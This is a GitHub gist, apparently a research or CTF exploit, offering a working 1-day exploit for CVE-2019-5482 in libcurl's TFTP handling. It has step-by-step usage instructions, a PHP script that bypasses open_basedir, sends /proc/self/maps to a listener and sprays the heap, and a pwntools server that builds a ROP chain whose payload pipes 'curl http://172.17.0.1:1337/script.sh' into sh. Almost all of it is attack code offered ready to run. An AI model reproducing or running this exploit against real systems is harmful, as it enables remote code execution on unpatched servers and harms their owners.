Skip to content

Instantly share code, notes, and snippets.

@PaulCher PaulCher/_readme.md Secret
Last active Sep 21, 2019

Embed
What would you like to do?
curl 1-day exploit
  1. Confirm that you have unpatched version of libcurl, which contains CVE-2019-5482
  2. Update ip addresses at the source files
  3. Launch srv.py on the server
  4. Upload sol.php via curl: curl http://$URL:$PORT/ -d 'rce@sol.php'
// <?php
error_reporting(-1);
ini_set('display_errors', 'On');
chdir("/tmp");
mkdir("/tmp/zzzzz");
chdir("/tmp/zzzzz");
echo getcwd() . "\n";
if (!ini_set('open_basedir', '..')) {
echo "failed";
}
while (!ini_set('open_basedir', '/')) {
chdir('..');
}
echo "open_basedir bypassed\n";
$maps = file_get_contents("/proc/self/maps");
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_connect($sock, '172.17.0.1', 12345);
if (socket_send($sock, $maps, strlen($maps), 0) === false) {
die("failed to send maps");
}
//$o = curl_init();
//curl_setopt($y, CURLOPT_COOKIELIST, "/bin/sh");
$a = curl_init();
$h = curl_init();
$b = curl_init();
$c = curl_init();
$d = curl_init();
$e = curl_init();
$f = curl_init();
$q = curl_init();
$w = curl_init();
$r = curl_init();
$t = curl_init();
$y = curl_init();
curl_setopt($a, CURLOPT_BUFFERSIZE, 0x1234);
curl_setopt($a, CURLOPT_COOKIELIST, str_repeat("A" , 0x1e0 - 8));
curl_setopt($b, CURLOPT_COOKIELIST, str_repeat("A" , 0x1e0 - 8));
curl_setopt($c, CURLOPT_COOKIELIST, str_repeat("A" , 0x1e0 - 8));
curl_setopt($d, CURLOPT_COOKIELIST, str_repeat("A" , 0x1e0 - 8));
curl_setopt($r, CURLOPT_COOKIELIST, str_repeat("A" , 0x1e0 - 8));
curl_setopt($e, CURLOPT_COOKIELIST, str_repeat("A" , 0x1e0 - 8));
curl_setopt($y, CURLOPT_COOKIELIST, str_repeat("A" , 0x1e0 - 8));
curl_setopt($t, CURLOPT_COOKIELIST, str_repeat("A" , 0x1e0 - 8));
curl_setopt($w, CURLOPT_COOKIELIST, str_repeat("A" , 0x1e0 - 8));
curl_setopt($q, CURLOPT_COOKIELIST, str_repeat("A" , 0x1e0 - 8));
$url = "tftp://172.17.0.1:1234";
curl_setopt($h, CURLOPT_URL, $url);
curl_setopt($h, CURLOPT_TFTP_BLKSIZE, 0x60 - 4);
echo "doing!\n";
$res = curl_exec($h);
echo "res = $res";
curl_close($h);
#!/usr/bin/env python
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
def main():
l = listen(1234, typ='udp')
ll = listen(12345, typ='tcp')
context.log_level = 'warning'
maps = ll.recvall(timeout=10)
context.log_level = 'debug'
for line in maps.split('\n'):
if 'r-x' in line and 'libsqlite3' in line:
words = line.split('-')
sqlite_base = int(words[0], 16)
if 'r-x' in line and 'libc-2.27.so' in line:
words = line.split('-')
libc_base = int(words[0], 16)
pivot = sqlite_base + 0x00000000000e4326 # pop; pop; pop; pop; pop rsp; pop ; pop ; ret
pop_rdi = libc_base + 0x000000000002155f # pop rdi ; ret
mov_gadget = sqlite_base + 0x000000000004d607 # mov rdi, rdx ; call r8
pop_r8 = sqlite_base + 0x00000000000147b8 # pop r8 ; ret
system_addr = libc_base + 324672
print 'sqlite_base', hex(sqlite_base)
print 'libc_base', hex(libc_base)
data = l.recv(0x26)
oack = ''
oack += '\0\x06hhh\0ppppp\0'
l.send(oack)
sleep(0.5)
p = ''
p += 'A' * (296 - 184)
p += 'curl http://172.17.0.1:1337/script.sh | sh\0'
p += 'A' * (296 - len(p))
p += 'B' * 8
p += p64(pivot)
p += 'A' * 0x10
p += p64(pop_r8)
p += p64(system_addr)
#p += 'Q' * 8
p += p64(mov_gadget)
p += cyclic(392 - len(p), n=8)
p += p64(0) # this is required to skip hash iteration cycle and jump right to call %%rax
p += 'A' * (0x200 - len(p))
#p = cyclic(0x200, n=8)
#p = p.replace(p64(0x6261616161616179), p64(0))
raw_input()
l.send(p)
sleep(1)
l.close()
if __name__ == '__main__':
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.